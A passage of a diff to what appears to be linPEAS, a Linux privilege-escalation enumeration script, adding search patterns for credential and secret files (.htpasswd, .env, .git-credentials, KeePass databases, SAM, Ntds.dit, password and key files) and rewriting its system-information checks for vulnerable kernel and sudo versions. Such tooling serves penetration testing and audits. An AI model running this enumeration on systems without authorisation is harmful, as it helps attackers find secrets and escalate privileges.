uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_INFLUXDB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ZABBIX=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/etc|^/usr|^/var" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KCPASSWORD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "kcpassword$" | sort | uniq | head -n 70) + PSTORAGE_SENTRY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) + PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "environments$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "roundcube$" | sort | uniq | head -n 70) + PSTORAGE_PASSBOLT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) + PSTORAGE_JETTY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) + PSTORAGE_WGET=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) ##### POST SERACH VARIABLES ##### @@ -1233,154 +1234,165 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil fi -if echo $CHECKS | grep -q SysI; then - ########################################### - #-------------) System Info (-------------# - ########################################### - print_title "System Information" - #-- SY) OS - print_2title "Operative system" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" - (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," - warn_exec lsb_release -a 2>/dev/null - if [ "$MACPEAS" ]; then - warn_exec system_profiler SPSoftwareDataType - fi - echo "" - #-- SY) Sudo - print_2title "Sudo version" - if [ "$(command -v sudo 2>/dev/null)" ]; then - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" - sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," - else echo_not_found "sudo" - fi - echo "" - #--SY) USBCreator - print_2title "USBCreator" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" - if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then - pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") - if [ -z "$pc_version" ]; then - pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) + + + + + + + + +if echo $CHECKS | grep -q system_information; +print_title "System Information" +########################################### +#-------------) System Info (-------------# +########################################### + +#-- SY) OS +print_2title "Operative system" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} 